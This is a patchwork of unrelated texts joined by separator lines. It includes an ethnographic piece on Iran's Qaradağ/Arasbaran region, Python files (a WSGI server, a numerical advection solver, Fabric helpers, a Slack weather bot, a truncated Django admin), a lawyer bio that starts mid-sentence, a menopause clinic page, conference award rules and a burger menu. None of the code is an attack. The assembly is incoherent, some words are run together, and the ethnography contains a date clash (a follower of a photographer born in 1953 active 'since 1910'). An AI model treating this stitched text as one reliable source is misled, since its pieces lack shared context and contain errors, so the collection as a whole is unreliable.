Vergi, meaning gift, is a perceived ability for performing extroordinary feats such as foretelling or healing, which can only be received from god or from Shia'' Imams. It is believed that a Vergi is inherited and not to be learned. For instance, there is a family in Vayqan among whom the Vergi for catching snakes is transmitted from generation to generation. Sometimes, the Vergi is claimed to be received in dreams. But often, it is received in Ojaqs where ghosts show themselves to and talk to gifted. It is believed that there is no escape from Vergi and that, at first, it generates suffering comparable to shamanistic illness.
Toğs; relics of Ashura day?
Ashura, the 10''th day of the lunar month Muharram, is the day at which the mourning celebrations commemorating Imam Husayns'' martyrdom reach their climax. In many villages of Qaradağ, palm sized metallic icons fixed on a medium sized wooden handles, locally known as Toğs, are harbingers of the exact hour when Husayn was killed; allegedly, they relapse to utter in-animation following ten days of relentless erratic movements at the hands of their carriers (alamdars). The tuğs – believed to be sisters – are housed in the mosques and are greatly revered by the inhabitants of all neighboring villages. Unfortunately, there is no systematic studies or first hand reports on these fascinating relics. Still, every year, as a ritualistic obligation, the expatriates flock to the said villages to receive the blessings of the sacred day in the company of their sacred Toğs. In the accompanying photo two persons holding toğ can be seen, who are surrounded by mourners beating on their legs. One toğ is kept standing still in the center. It seems that the other toğ is performing erratic motions and is pulling the holder.
Orhan Pamuk in 2001 Turkish novel, My Name Is Red, gives a vivid description of Turkic people''s love-hate attitude towards dogs. Every summer, the real life version of this description is in display in Chaparli. Each family has 2-5 dogs, all with characteristic cropped ears and tails. The dogs are fed generous portions of milk soaked breads. When the sheep herds are brought back for milking near tents, dogs sleep around the camp most of the day. The inhabitants treat the beasts with utter respect, a manner which is loathed by more pious villagers of the region as a pagan act. Between dusk and down dogs regain their vicious character; strangers have to avoid crossing campsite otherwise the attacking dogs cannot be controlled even by their owners. Fending off the dogs by beating is considered an act of aggression towards the owner and should be avoided. In fact most of the feuds between settled villagers and pastoralists is about dogs.
Carpet weaving stands out as the acme of Azeri art and people of Arasbaran have significantly contributed to this artistic tradition. Arabaran carpet was a hybrid between Persian carpet and Azerbaijani rug. Still, there were indigenous style, too. For instance, carpets, known as **Balan Rug**, had a size of approximately 1x4 m2 and a characteristic pattern.
The acme of carpet weaving art in Arasbaran is manifested in Verni, which was originated in Nagorno-Karabakh. Verni is a carpet-like kilim with a delicate and fine warp and woof, which is woven without a previous sketch, thanks to the creative talents of nomadic women and girls. Verni weavers employ the image of birds and animals (deer, rooster, cat, snake, birds, gazelle, sheep, camel, wolf and eagle) in simple geometrical shapes, imitating the earthenware patterns that were popular in prehistoric times. A key décor feature, which is intrinsic to many Vernis, is the S-element. Its shape varies, it may resemble both figure 5 and letter S. This element means “dragon” among the nomads. At present, Verni is woven by the girls of Arasbaran Tribes, often in the same room where the nomadic tribes reside, and is a significant income source for about 20000 families. Verni weavers employ the image of birds and animals in simple geometrical shapes, imitating the earthenware patterns that were popular in prehistoric times.
These opening verses of a contemporary Ashug song, composed by Məhəmməd Araz, may well represent the essence of Qaradağ''s cultural identity; frequent allusions to a mountain with the intention of arousing an emotional state with a tone of mild melancholy- a state well expressed by the Ashughi Music.
A century long autocratic nation building policies of Pahlavi era in Iran has succeeded in cultural assimilation in the favor of a government sanctioned culture. The mountainous region of Qaradağ, however, relatively escaped the demise due to its remoteness and inaccessibility. Many elements of the indigenous culture, particularly local music, have survived to the present day. More recently a slow but persistent cultural revival has been in progress and the inhabitants along with their city dwelling relatives perceive an awareness of their common cultural roots with the inhabitants of eastern Turkey and Azerbaijan republics,where a cultural renaissance is well underway since the collapse of the Soviet Union. The Ashughi music is cornerstone of this shared identity.
The number of ashughs has significantly increased after Aşiq Imran Heydəri (عاشیق ایمران حیدری) started accepting pupils to his academic style classes in Tabriz. Imran''s efforts effectively shifted the general impression of the ashugh music from association to the nomadic life in mountains to a music suited for performances in urban settings. At present, the de facto representative of ashughs is Aşiq Rəsol Qorbani from Abbasabad village.
Up until Islamic revolution the region had a subsistence economy – all food was produced within the villages and the surplus was bartered with items supplied by travelling salesman. Most women spent winter months weaving carpets using raw material which were locally produced. Rainfed agriculture on the steep slopes had severely eroded the farms and productivity had dropped to unsustainable low level, and the inhabitants had to supplement their income by taking seasonal construction jobs in Tehran. After revolution, thanks to the construction of roads and accessibility of larger town markets, livestock production became the dominant mode of the region''s economy. However, the quarrels over grazing rights didn''t allow large scale animal agriculture.
In recent years beekeeping has emerged as the only occupation that can provide a family with sufficient income. The honey produced in villages close to pastures is renowned for the its quality and has an established niche market. Mardanaqom village is one of the main producers of honey.
Babak Fort, which is located on a mountain summit near Kaleybar, is a large citadel and National Symbol of Iranians and Iranian Azerbaijanis.
Jowshīn Fort ( قلعه جوشین ) is located in Varzaqan County. The fort was probably built in the fifth century.
Ahar Bazar (بازار اهر) is one of the Iranian national monuments. It is adorned in a spectacular fashion, with specific plaster moldings and unique oriental design. The bazaar is composed of various sections and has been repaired during the Qajar period.
the mausoleum of Sheikh Shaabe-deen. The monument has been described by James Morier in early nineteenth century as the following, "The mausoleum is of brick, with a foundation of stone, and faced by an elevated portico, flanked by two minors or pillars encrusted with green tiles. A little wooden door was opened for us in the back of the building, which introduced us into the spot that contained the tomb of the Sheikh, which was enclosed by a stone railing, carved into open work, and surrounded by a sculptured arabesque ornament, of very good taste. The tomb is distinguished by a marble cover, on which is an Arabic inscription in relieve."
Khoda Afarin bridges. Two bridges on Aras river are located near Khomarlu. One bridge is badly damaged and the other is still usable for pedestrians. The later bridge is 160 m in length.
Amir Arshad''s residence (خانه امیر ارشد) in the Okhara village of Varzaqan County is still standing and has been registered as a historical site.
Qantoor building in Aynaloo, is a mansion which was built in 1907 by a wealthy Armenian businessman. This landmark building is important in the context of highlighting the religious and technical tolerance that was a unique characteristic of Arasbaran region.
Kordasht bath (حمام کردشت) is a royal bath which was built in sixteenth century by king Abbas I of Persia.
Sattar Khan was originally from Qaradağ. He is considered as a national hero of Iran and is referred to as سردار ملی (meaning National Commander). He headed Constitutionalist rebels from the Amirkhiz district of Tabriz in early twentieth century.
Babak Khorramdin, who until recently was fairly unknown to locals, is becoming a national hero particularly among new generation of Iranians as a symbol of resistance against Arab invasion twelve centuries ago. During the relative liberalism of Khatami era (1997–2005) every year in the last week of June Azerbijani nationalists celebrated his birthday symbolically at the Babak Castle. Babak''s legacy has been a controversial subject in academic and intellectual circles of Iran.
Amir Arshad, the headman of Haji-Alilu tribe, was a legendary military commander in early twentieth century. He is credited with fending off the communism from Iran.
Rahimkhan Chalabianloo, the infamous chief of Chalabianloo Tribe, is known for opposing Constitutionalists in early twentieth century.
Karim Pasha Bahadori, a prominent landlord, was the secretary of former queen, Farah Pahlavi.
Qasem Ahari was born in Ahar in 1884. He was the first European trained ophthalmologist of Iran. Qasem Ahari served four terms in National Consultative Assembly. He was the first representative of Azerbaijan in Senate of Iran.
Asadollah Mohammadkhanlu, the headman of Mohammad Khanlu tribe, was a feudal and influential politician during Pahlavi era. He was among the first group of people whose properties were confiscated just after the Islamic Revolution.
Three generation of Mirahmadi family from Hasanbeyglu tribe have been significant political players in local and national levels since Constitutional Revolution of early twentieth century.
Andre Agassi, the retired professional tennis player and former World No. 1, is the son of man originally from Arasbaran.
Aşıq Hoseyn Javan, born in Oti Kandi, is the legendary Ashik who was exiled to Soviet Union due to his revolutionary songs during the brief reign of Azerbaijan People''s Government following the World War II. Hoseyn Javan''s music, in contrast to the contemporary poetry in Iran, emphasizes on realism and highlights the beauties of real life. One of Hoseyn''s songs, with the title "Kimin olacaqsan yari, bəxtəvər?", is among the most famous Ashugh songs.
Rasool Qorbani (رسول قربانی), recognized as the godfather among the masters of Ashugh music, was born in 1933 in AbbasAbad. Rasool started his music career in 1952 and by 1965 was an accomplished Ashik. Rasool had performed in international music festivals held in France, Germany, the Netherlands, England, Japan, China, Czech Republic, Slovakia, Austria, Australia, Azerbaijan, Serbia, Turkey and Hungary. Rasool has been awarded highest art awards of the country, and will be honored by government during the celebration for his 80th birthday. changiz mehdipour (چنگیز مهدیپور), born in Sheykh Hoseynlu, has significantly contributed to the revival and development of Ashugh music. His book on the subject attempts to adapt the Ashugh music to the artistic taste of the contemporary audience.
Khanali Siami (1953–2013) was a famous photographer. His published photo-album is the first comprehensive visual presentation of East Azarbaijan Province. Since 1910, Ravanbakhsh Leysi, a high school teacher from Kaleybar has followed the footsteps of Siami in Nature photography. Most photos in this article were taken by him.
Abbas Eslami (عباس بارز), known with his pen-name Barez, (1932–2011) was a great poet. He described the melancholic demise of Qaradağ in a book titled mourning Sabalan ( ياسلي ساوالان).
Bahman Zamani, a rebel-poet, has influenced revolutionary generation of 1960-1980 by highlighting the pitiful state of Qaradağ due to centralist policies of Pahlavi era. His most famous poem in this regard is Qaradağ(قرهداغ). Bahman is also famous for composing the song "Araz Araz Khan Araz" in the memory of Samad Behrangi.
Sattar Golmohamadi and his nephew Mohamad Golmohamadi are contemporary poets, both dedicated their poems to the cultural identity of Qaradağ region. Mohamad Golmohamadi''s poem, titled (قاراداغ اؤلکهسینین گؤر نئجه دیوانهسی ام), is a concise description of the region''s cultural landscape.
Ayatollah Hojat (آیت الله العظمی سید محمد حجت کوهکمری) was one of the highest ranking clerics of the twentieth century. He was the supreme legal authority or the source of emulation for millions of Shia'' Muslims before the Iranian Revolution.
Prof. Mahmoud Akhondi (محمود آخوندى) was born ii 1933. He is an eminent Swiss-trained law professor. His 10 volume book on criminal prosecution is a major textbook in Iranian law schools.
Colonel Husein Bybordi ( حسين بايبوردي ) was borne in Ahar and retired from Army in 1959. He wrote and published two books on the history of Arasbaran. This book is, perhaps, the only comprehensive original source on Arasbaran and the Bybordi tribe and its history as well as its migration.
Ḥusayn Dūstī (حسین دوستی), was born in Ahar. He is a prolific writer of books dealing with Arasbaran.
|
# This file is part of the Enkel web programming library.
#
# Copyright (C) 2007 Espen Angell Kristiansen ([email protected])
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
""" Defines a basic standalone WSGI server/handler.
WSGI is specified in PEP 333 which can be found
U{here <http://www.python.org/dev/peps/pep-0333>}.
"""
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
from SocketServer import ThreadingMixIn, ForkingMixIn
from os import environ
from datetime import datetime
from sys import stderr
import logging
from server_base import WsgiServerMixIn, LoggerAsErrorFile
from apprunner import run_app, Response
from utils import rfc1123_date
from env import urlpath_to_environ
class HttpServerResponse(Response):
""" Adds automatic adding of required http headers
to the L{apprunner.Response} class. Headers are only added
when not supplied by the app. These headers are handled:
- server (defaults to L{__init__} parameter I{server_info})
- date (defaults to the UTC/GMT time when the response is sent)
"""
def __init__(self, server_info, *args, **kw):
super(HttpServerResponse, self).__init__(*args, **kw)
self.server_info = server_info
def validate_header(self, name, value):
if name in ("server", "date"):
try:
del self.extra_headers[name]
except KeyError:
pass
def generate_headers(self):
self.extra_headers["server"] = self.server_info
self.extra_headers["date"] = rfc1123_date(datetime.utcnow())
return super(HttpServerResponse, self).generate_headers()
class WsgiRequestHandler(BaseHTTPRequestHandler):
""" A WSGI request handler. You do not call this directly,
but send it as a parameter to L{Server.__init__}.
@cvar ENV: Default values for the WSGI environ dict. See
L{create_env} for more information.
"""
ENV = {}
def do_GET(self):
self.handle_wsgi_request("GET")
def do_POST(self):
self.handle_wsgi_request("POST")
def do_OPTIONS(self):
self.handle_wsgi_request("OPTIONS")
def do_HEAD(self):
self.handle_wsgi_request("HEAD")
def do_PUT(self):
self.handle_wsgi_request("PUT")
def do_DELETE(self):
self.handle_wsgi_request("DELETE")
def do_TRACE(self):
self.handle_wsgi_request("TRACE")
def do_CONNECT(self):
self.handle_wsgi_request("CONNECT")
def create_env(self, method):
""" Create the WSGI environ dict.
These variables are defined:
- byte strings:
- REQUEST_METHOD
- SERVER_PROTOCOL
- SERVER_NAME
- SERVER_PORT
- CONTENT_TYPE
- CONTENT_LENGTH
- REMOTE_ADDR
- wsgi.url_scheme
- wsgi.version
- wsgi.input (file-like object)
- wsgi.errors (file-like object)
- wsgi.multithread (bool)
- wsgi.run_once (bool)
And all HTTP-headers provided by the client prefixed with
'HTTP_'.
@note: This is the most minimal environment allowed by
PEP 333. You might wish to subclass this to provide
more environment variables.
@return: The WSGI environ dict to be sent to the application.
"""
env = self.ENV.copy()
if not (len(self.server.server_address) == 2 and \
isinstance(self.server.server_address[1], int)):
raise ValueError("can only listen to internet protocol "\
"server_address'es, like ('localhost', 8000).")
env.update({
"REQUEST_METHOD": method,
"SERVER_PROTOCOL": self.protocol_version,
"SERVER_NAME": self.server.server_address[0],
"SERVER_PORT": str(self.server.server_address[1]),
"CONTENT_TYPE": self.headers.get("content-type", ""),
"CONTENT_LENGTH": self.headers.get("content-length", ""),
"REMOTE_ADDR": self.client_address[0],
"wsgi.input": self.rfile
})
self.server.add_common_wsgienv(env)
# Add all http headers client provided
for name in self.headers:
value = self.headers.get(name)
env["HTTP_" + name.upper()] = value
return env
def handle_wsgi_request(self, method):
""" Create a WSGI environ dict (using L{create_env} and run
the app. """
# Create the WSGI environ dict
env = self.create_env(method)
self.server.log.info("connected by %s" % str(self.client_address))
# parse path
urlpath_to_environ(env, self.path)
req = HttpServerResponse(self.server.server_info, self.wfile, env,
self.server.debug)
run_app(self.server.app, req)
class Server(HTTPServer, WsgiServerMixIn):
""" A synchronous HTTP WSGI server.
Works more or less like L{scgi.Server} which is
much better documented.
"""
REQUEST_HANDLER = WsgiRequestHandler
url_scheme = "http"
log = logging.getLogger("enkel.wansgli.http.server")
applog = LoggerAsErrorFile(logging.getLogger(
"enkel.wansgli.http.app"))
def __init__(self, app, server_address=("",9000)):
"""
@param app: A WSGI app as defined in PEP 333.
"""
self.app = app
HTTPServer.__init__(self, server_address, self.REQUEST_HANDLER)
class ThreadingServer(ThreadingMixIn, Server):
""" A threading HTTP WSGI server. """
MULTITHREAD = True
class ForkingServer(ForkingMixIn, Server):
""" A forking HTTP WSGI server. """
MULTIPROCESS = True
|
Counsel to Governor Gary Johnson’sLibertarian campaign for U.S. Presidency.
on ballots. This earned Dearn a reputation as fearless as she single-handedly defeated some of the nation’s top-ranked election lawattorneys in multiple eleventh-hour state electoral proceedingssimultaneously. She is widely published on topics of law, politics andbusiness and regularly speaks at business organizations and atuniversities. She is a regular contributor to The Andrea Kaye Show onAM 1170. She is also serving a two-year term as President of the SaintLouis chapter of the National Association of Professional Women.
|
from __future__ import division
import numpy as np
import scipy.sparse as sp
from scipy.sparse.linalg import splu
from pySDC.core.Problem import ptype
from pySDC.core.Errors import ParameterError, ProblemError
# noinspection PyUnusedLocal
class advection1d(ptype):
"""
Example implementing the unforced 1D advection equation with periodic BC in [0,1],
discretized using upwinding finite differences
Attributes:
A: FD discretization of the gradient operator using upwinding
dx: distance between two spatial nodes
"""
def __init__(self, problem_params, dtype_u, dtype_f):
"""
Initialization routine
Args:
problem_params (dict): custom parameters for the example
dtype_u: mesh data type (will be passed parent class)
dtype_f: mesh data type (will be passed parent class)
"""
# these parameters will be used later, so assert their existence
essential_keys = ['nvars', 'c', 'freq']
for key in essential_keys:
if key not in problem_params:
msg = 'need %s to instantiate problem, only got %s' % (key, str(problem_params.keys()))
raise ParameterError(msg)
# we assert that nvars looks very particular here.. this will be necessary for coarsening in space later on
if (problem_params['nvars']) % 2 != 0:
raise ProblemError('setup requires nvars = 2^p')
if problem_params['freq'] >= 0 and problem_params['freq'] % 2 != 0:
raise ProblemError('need even number of frequencies due to periodic BCs')
if 'order' not in problem_params:
problem_params['order'] = 1
if 'type' not in problem_params:
problem_params['type'] = 'upwind'
# invoke super init, passing number of dofs, dtype_u and dtype_f
super(advection1d, self).__init__(init=problem_params['nvars'], dtype_u=dtype_u, dtype_f=dtype_f,
params=problem_params)
# compute dx and get discretization matrix A
self.dx = 1.0 / self.params.nvars
self.A = self.__get_A(self.params.nvars, self.params.c, self.dx, self.params.order, self.params.type)
@staticmethod
def __get_A(N, c, dx, order, type):
"""
Helper function to assemble FD matrix A in sparse format
Args:
N (int): number of dofs
c (float): diffusion coefficient
dx (float): distance between two spatial nodes
order (int): specifies order of discretization
type (string): upwind or centered differences
Returns:
scipy.sparse.csc_matrix: matrix A in CSC format
"""
coeff = None
stencil = None
zero_pos = None
if type == 'center':
if order == 2:
stencil = [-1.0, 0.0, 1.0]
zero_pos = 2
coeff = 1.0 / 2.0
elif order == 4:
stencil = [1.0, -8.0, 0.0, 8.0, -1.0]
zero_pos = 3
coeff = 1.0 / 12.0
elif order == 6:
stencil = [-1.0, 9.0, -45.0, 0.0, 45.0, -9.0, 1.0]
zero_pos = 4
coeff = 1.0 / 60.0
else:
raise ProblemError("Order " + str(order) + " not implemented.")
else:
if order == 1:
stencil = [-1.0, 1.0]
coeff = 1.0
zero_pos = 2
elif order == 2:
stencil = [1.0, -4.0, 3.0]
coeff = 1.0 / 2.0
zero_pos = 3
elif order == 3:
stencil = [1.0, -6.0, 3.0, 2.0]
coeff = 1.0 / 6.0
zero_pos = 3
elif order == 4:
stencil = [-5.0, 30.0, -90.0, 50.0, 15.0]
coeff = 1.0 / 60.0
zero_pos = 4
elif order == 5:
stencil = [3.0, -20.0, 60.0, -120.0, 65.0, 12.0]
coeff = 1.0 / 60.0
zero_pos = 5
else:
raise ProblemError("Order " + str(order) + " not implemented.")
dstencil = np.concatenate((stencil, np.delete(stencil, zero_pos - 1)))
offsets = np.concatenate(([N - i - 1 for i in reversed(range(zero_pos - 1))],
[i - zero_pos + 1 for i in range(zero_pos - 1, len(stencil))]))
doffsets = np.concatenate((offsets, np.delete(offsets, zero_pos - 1) - N))
A = sp.diags(dstencil, doffsets, shape=(N, N), format='csc')
A *= c * coeff * (1.0 / dx)
return A
def eval_f(self, u, t):
"""
Routine to evaluate the RHS
Args:
u (dtype_u): current values
t (float): current time
Returns:
dtype_f: the RHS
"""
f = self.dtype_f(self.init)
f.values = -1.0 * self.A.dot(u.values)
return f
def solve_system(self, rhs, factor, u0, t):
"""
Simple linear solver for (I+factor*A)u = rhs
Args:
rhs (dtype_f): right-hand side for the linear system
factor (float) : abbrev. for the node-to-node stepsize (or any other factor required)
u0 (dtype_u): initial guess for the iterative solver (not used here so far)
t (float): current time (e.g. for time-dependent BCs)
Returns:
dtype_u: solution as mesh
"""
me = self.dtype_u(self.init)
L = splu(sp.eye(self.params.nvars, format='csc') + factor * self.A)
me.values = L.solve(rhs.values)
return me
def u_exact(self, t):
"""
Routine to compute the exact solution at time t
Args:
t (float): current time
Returns:
dtype_u: exact solution
"""
me = self.dtype_u(self.init)
if self.params.freq >= 0:
xvalues = np.array([i * self.dx for i in range(self.params.nvars)])
me.values = np.sin(np.pi * self.params.freq * (xvalues - self.params.c * t))
else:
np.random.seed(1)
me.values = np.random.rand(self.params.nvars)
return me
|
This is a multidisciplinary service led by Miss Lynne Robinson with recognised national expertise in the field.
The clinic provides a holistic approach to the management of the menopause and associated health conditions, with a focus on counselling on the personalised benefits and risks associated with using, hormone replacement therapy (HRT), alternative and complimentary therapies.
Treatment and advice incorporate the best evidence and uses the framework of the NICE guideline (2015) Menopause: Diagnosis and Management and British Menopause Society guidance. It is individualised according to personal health risks and benefits. The advice is aimed at relieving symptoms and promoting long-term health.
It is important to note that risks associated with HRT use in postmenopausal women over the age of 51 are not always applicable to women under the age of 51. HRT should be taken up to the average age of the menopause to avoid premature cardiovascular disease or osteoporosis.
The clinic also has expertise in the management of women with premature ovarian insufficiency under the age of forty. These younger women have specific needs. This includes consideration of possible long-term health implications and fertility advice. Find out more at The Daisy Network (support network). There is a direct link to the fertility service for women also seeking fertility treatment.
Women started on hormone implants are followed up in the specialist Wednesday clinic.
Birmingham Women's Hospital is fortunate to have direct access to the wider multidisciplinary team of specialist services within the building: weight management, counselling, psychosexual counselling, physiotherapy, urogynaecology, and fertility services.
Implant appointments are every 4 to 8 months. There is a use of blood levels to guide therapy. You will be given individualised guidance about the need for an oestrogen blood test before the appointment. Blood tests can be done at your GP, but results must be brought personally.
Led by our Clinical Nurse Specialists.
Should you require help advice or support between your clinic appointments there is answerphone helpline service run by the specialist Nurses. It is possible that you may be offered the opportunity to have follow up appointments or receive some test results via telephone consultation. The aim is to provide a convenient and efficient service that avoids unnecessary trips to hospital. Once discharged from the outpatient clinic, clear advice is sent to the GP regarding future management. Advice can still be sourced from the telephone support service, but it may be necessary for us to request a re-referral to the menopause clinic if it has been more than 12 months since the last appointment.
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import shutil
import tarfile
import tempfile
from fabric.api import run, sudo
from fabric.context_managers import documented_contextmanager
from dockermap.shortcuts import rm, chmod, chown
from .output import single_line_stdout
_safe_name = lambda tarinfo: tarinfo.name[0] != '/' and not '..' in tarinfo.name
def get_remote_temp():
"""
Creates a temporary directory on the remote end. Uses the command ``mktemp`` to do so.
:return: Path to the temporary directory.
:rtype: unicode
"""
return single_line_stdout('mktemp -d')
def remove_ignore(path, use_sudo=False):
"""
Recursively removes a file or directory, ignoring any errors that may occur. Should only be used for temporary
files that can be assumed to be cleaned up at a later point.
:param path: Path to file or directory to remove.
:type path: unicode
:param use_sudo: Use the `sudo` command.
:type use_sudo: bool
"""
which = sudo if use_sudo else run
which(rm(path, recursive=True), warn_only=True)
def is_directory(path, use_sudo=False):
"""
Check if the remote path exists and is a directory.
:param path: Remote path to check.
:type path: unicode
:param use_sudo: Use the `sudo` command.
:type use_sudo: bool
:return: `True` if the path exists and is a directory; `False` if it exists, but is a file; `None` if it does not
exist.
:rtype: bool or ``None``
"""
result = single_line_stdout('if [[ -f {0} ]]; then echo 0; elif [[ -d {0} ]]; then echo 1; else echo -1; fi'.format(path), sudo=use_sudo, quiet=True)
if result == '0':
return False
elif result == '1':
return True
else:
return None
@documented_contextmanager
def temp_dir(apply_chown=None, apply_chmod=None):
"""
Creates a temporary directory on the remote machine. The directory is removed when no longer needed. Failure to do
so will be ignored.
:param apply_chown: Optional; change the owner of the directory.
:type apply_chown: bool
:param apply_chmod: Optional; change the permissions of the directory.
:type apply_chmod: bool
:return: Path to the temporary directory.
:rtype: unicode
"""
path = get_remote_temp()
if apply_chmod:
run(chmod(apply_chmod, path))
if apply_chown:
sudo(chown(apply_chown, path))
yield path
remove_ignore(path, True)
@documented_contextmanager
def local_temp_dir():
"""
Creates a local temporary directory. The directory is removed when no longer needed. Failure to do
so will be ignored.
:return: Path to the temporary directory.
:rtype: unicode
"""
path = tempfile.mkdtemp()
yield path
shutil.rmtree(path, ignore_errors=True)
def extract_tar(filename, dest_path, **kwargs):
"""
Extracts a TAR archive. All element names starting with ``/`` (indicating an absolute path) or that contain ``..``
as references to a parent directory are not extracted.
:param filename: Path to the tar file.
:type filename: unicode
:param dest_path: Destination path to extract the contents to.
:type dest_path: unicode
:param kwargs: Additional kwargs for opening the TAR file (:func:`tarfile.open`).
"""
with tarfile.open(filename, 'r', **kwargs) as tf:
safe_members = [name for name in tf.getmembers() if _safe_name(name)]
if safe_members:
tf.extractall(dest_path, safe_members)
|
The American Transplant Congress will grant a number of Awards to for outstanding work that is submitted through the ATC 2019 abstract submission.
This award is designed to recognize a Young Investigator's outstanding work and to help off set the expense to attend the Congress.
An individual must be the first author on a submitted abstract and must present the abstract during ATC 2019.
An individual must be a Trainee within (2) years completion of their training and/or fellowship in a program in which either an ASTS or AST member is associated.
A signed letter from the Trainee's program director identifying and requesting travel support need uploaded at the time of abstract submission.
No exceptions will be made should the criteria above not be met.
ATC attendees will have the opportunity to vote for the Best in Congress Posters presented during each poster session. Voting will be done via the ATC mobile application.
Should your poster be selected, ATC will send you a notification to submit a PowerPoint or PDF of your poster.
Your poster PowerPoint or PDF will then be displayed on a large monitor the morning after your poster presentation.
The monitor will be displayed on Level 2 of the John B. Hynes Convention Center.
|
# -*- coding: utf-8 -*-
"""!weather <zip or place name> return the 5-day forecast
Three environment variables control the behavior of this plugin:
MAPBOX_API_TOKEN: must be set to a valid Mapbox API token
https://docs.mapbox.com/api/search/#geocoding
OPENWEATHER_API_KEY: must be set to a valid OpenWeather API key
https://openweathermap.org/current
https://openweathermap.org/forecast5
WEATHER_CELSIUS: if this environment variable is present with any value,
the plugin will report temperatures in celsius instead of
farenheit
"""
try:
from urllib import quote
except ImportError:
from urllib.request import quote
import json
import os
import re
from datetime import datetime
import requests
# https://openweathermap.org/weather-conditions
ICONMAP = {
"01d": ":sunny:",
"01n": ":moon:",
"02d": ":sun_behind_cloud:",
"02n": ":sun_behind_cloud:",
"03d": ":cloud:",
"03n": ":cloud:",
"04d": ":cloud:",
"04n": ":cloud:",
"09d": ":rain_cloud:",
"09n": ":rain_cloud:",
"10d": ":sun_behind_rain_cloud:",
"10n": ":sun_behind_rain_cloud:",
"11d": ":thunder_cloud_and_rain:",
"11n": ":thunder_cloud_and_rain:",
"13d": ":snowflake:",
"13n": ":snowflake:",
"50d": ":fog:",
"50n": ":fog:",
}
CELSIUS = "metric"
IMPERIAL = "imperial"
MAPBOX_API_TOKEN = os.environ.get("MAPBOX_API_TOKEN")
OPENWEATHER_API_KEY = os.environ.get("OPENWEATHER_API_KEY")
def weather(searchterm):
"""Get the weather for a place given by searchterm
Returns a title and a list of forecasts.
The title describes the location for the forecast (i.e. "Portland, ME USA")
The list of forecasts is a list of dictionaries in slack attachment fields
format (see https://api.slack.com/docs/message-attachments)
"""
unit = CELSIUS if os.environ.get("WEATHER_CELSIUS") else IMPERIAL
unit_abbrev = "f" if unit == IMPERIAL else "c"
geo = requests.get(
"https://api.mapbox.com/geocoding/v5/mapbox.places/{}.json?limit=1&access_token={}".format(
quote(searchterm.encode("utf8")), MAPBOX_API_TOKEN
)
).json()
citystate = geo["features"][0]["place_name"]
lon, lat = geo["features"][0]["center"]
title = "Weather for {}: ".format(citystate)
forecast = requests.get(
"https://api.openweathermap.org/data/2.5/forecast/daily?lat={:.2f}&lon={:.2f}&cnt=4&units={}&appid={}".format(
lat, lon, unit, OPENWEATHER_API_KEY
)
).json()
if forecast["cod"] != "200":
raise KeyError("Invalid OpenWeatherMap key")
messages = []
for cast in forecast["list"]:
# do I need to mess with tz at all, or is this accurate enough?
dt = datetime.fromtimestamp(cast["dt"]).strftime("%A")
high = int(round(cast["temp"]["max"]))
icon = ICONMAP.get(cast["weather"][0]["icon"], ":question:")
messages.append(
{
"title": dt,
"value": u"{} {}°{}".format(icon, high, unit_abbrev),
"short": True,
}
)
return title, messages
def on_message(msg, server):
text = msg.get("text", "")
match = re.findall(r"!weather (.*)", text)
if not match:
return
try:
title, forecasts = weather(match[0])
except KeyError as err:
return "KeyError: {}".format(err.args[0])
attachment = {"fallback": title, "pretext": title, "fields": forecasts[0:4]}
server.slack.post_message(
msg["channel"],
"",
as_user=server.slack.username,
attachments=json.dumps([attachment]),
thread_ts=msg.get("thread_ts", None),
)
on_bot_message = on_message
|
All natural 100% Canadian angus beef, Canadian cheddar, sweet relish, red onion, tomato and hero sauce on sesame poppy bun.
Two 4Oz. 100% Canadian angus beef patties, 2 slices of Canadian cheddar, sweet relish, tomatoes, red onion and hero sauce on sesame poppy bun.
470 Cals, 100% vegetarian soy patty topped with sauteed onions, portobello , jalapenos, lettuce and hot sauce.
All natural 100% Canadian angus beef, fried egg, strip bacon and tomato on a sesame poppy bun.
All natural 100% Canadian Angus beef topped with fried onion ring, guacamole, bacon, smoked white cheddar, lettuce, tomato and hero sauce on sesame poppy bun.
580 Cals, Grilled chicken breast rolled in signature Cajun spice, topped with smoked white cheddar, lettuce, tomato, red onion and hero sauce on an ciabatta bun.
All natural 100% Canadian angus beef, creamy blue cheese, portobello mushrooms, lettuce and tomato on sesame poppy bun.
590 Cals, crispy chicken fillet, mutti Italian tomato sauce, parmigiano, real cheese and ciabatta.
610 Cals, grilled chicken breast, roasted red peppers, blue cheese, portobello mushrooms and mayonnaise on an ace bakery ciabatta bun.
490 Cals, 100% Angus beef hot dog topped with Canadian cheddar, hero sauce and slawsa.
All natural 100% Canadian angus beef topped with hand rubbed beef bacon, smoked white cheddar, lettuce, tomato and hero sauce on sesame poppy bun.
485 Cals, fresh cut fries, cooked in trans fat free oil.
800 Cals, fresh cut fries, real cheese curds and non gmo, vegetarian gravy.
350 Cals, hero certified's own crunchy chicken strips, comes with six to seven pieces.
960 Cals, fresh cut fries, angus beef chunks, real cheese curds and non gmo vegetarian gravy.
350 Cals, Fresh cut fries, angus beef chunks, real cheese curds and non gmo vegetarian gravy.
810 Cals, fresh cut fries, portobello mushrooms, real cheese curds and non gmo vegetarian gravy.
|
import os
from django.contrib import admin
from django.conf import settings
from apps.pages.models import Page, Page_translation
from apps.pages.forms import Page_translationInlineForm, PageForm
class Page_translationInline(admin.StackedInline):
model = Page_translation
form = Page_translationInlineForm
verbose_name = 'Lang'
extra = 0
fieldsets = [
('Content', {'fields': ['lang', 'menu', 'name', 'col_central',
'youtube', 'photo_description', 'col_right',
'col_bottom_1', 'col_bottom_2', 'col_bottom_3'],
'classes': ['collapse']}),
('SEO', {'fields': ['meta_title', 'meta_description', 'meta_keywords',
'photo_alt'], 'classes': ['collapse']}),
]
search_fields = ['col_central', 'col_right', 'col_bottom_1', 'col_bottom_2',
'col_bottom_3']
max_num = len(settings.LANGUAGES)
def get_queryset(self, request):
return Page_translation.objects.filter(lang__in=[x[0] for x in settings.LANGUAGES])
class PageAdmin(admin.ModelAdmin):
form = PageForm
inlines = [Page_translationInline]
save_on_top = True
readonly_fields = ('photo_thumb',)
view_on_site = True
def date_update(self, model):
